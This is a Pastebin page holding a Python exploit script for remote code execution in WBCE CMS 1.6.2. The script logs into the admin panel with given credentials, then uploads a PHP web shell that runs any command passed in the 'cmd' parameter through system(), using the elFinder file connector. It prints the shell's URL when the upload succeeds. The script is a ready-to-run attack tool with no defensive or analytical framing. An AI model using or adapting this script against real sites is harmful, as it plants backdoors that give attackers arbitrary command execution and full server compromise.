API tools faq
paste
Advertisement
FlyFar

WBCE CMS v1.6.2 - Remote Code Execution (RCE)

FlyFar
Jun 24th, 2024
457
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.34 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)
  2. # Date: 3/5/2024
  3. # Exploit Author: Ahmet Ümit BAYRAM
  4. # Vendor Homepage: https://wbce-cms.org/
  5. # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip
  6. # Version: 1.6.2
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. from bs4 import BeautifulSoup
  11. import sys
  12. import time
  13.  
  14. def login(url, username, password):
  15. print("Logging in...")
  16. time.sleep(3)
  17. with requests.Session() as session:
  18. response = session.get(url + "/admin/login/index.php")
  19. soup = BeautifulSoup(response.text, 'html.parser')
  20. form = soup.find('form', attrs={'name': 'login'})
  21. form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in
  22. form.find_all('input') if input_tag.get('type') != 'submit'}
  23. # Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle
  24. form_data[soup.find('input', {'name': 'username_fieldname'})['value']] =
  25. username
  26. form_data[soup.find('input', {'name': 'password_fieldname'})['value']] =
  27. password
  28. post_response = session.post(url + "/admin/login/index.php", data=form_data)
  29. if "Administration" in post_response.text:
  30. print("Login successful!")
  31. time.sleep(3)
  32. return session
  33. else:
  34. print("Login failed.")
  35. print("Headers received:", post_response.headers)
  36. print("Response content:", post_response.text[:500]) # İlk 500 karakter
  37. return None
  38.  
  39. def upload_file(session, url):
  40. # Dosya içeriğini ve adını belirleyin
  41. print("Shell preparing...")
  42. time.sleep(3)
  43. files = {'upload[]': ('shell.inc',"""<html>
  44. <body>
  45. <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  46. <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
  47. <input type="SUBMIT" value="Execute">
  48. </form>
  49. <pre>
  50. <?php
  51. if(isset($_GET['cmd']))
  52. {
  53. system($_GET['cmd']);
  54. }
  55. ?>
  56. </pre>
  57. </body>
  58. </html>""", 'application/octet-stream')}
  59. data = {
  60. 'reqid': '18f3a5c13d42c5',
  61. 'cmd': 'upload',
  62. 'target': 'l1_Lw',
  63. 'mtime[]': '1714669495'
  64. }
  65. response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",
  66. files=files, data=data)
  67. if response.status_code == 200:
  68. print("Your Shell is Ready: " + url + "/media/shell.inc")
  69. else:
  70. print("Failed to upload file.")
  71. print(response.text)
  72.  
  73. if __name__ == "__main__":
  74. url = sys.argv[1]
  75. username = sys.argv[2]
  76. password = sys.argv[3]
  77. session = login(url, username, password)
  78. if session:
  79. upload_file(session, url)
  80.            
Tags: Exploit Vulnerability RCE WBCE CMS
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!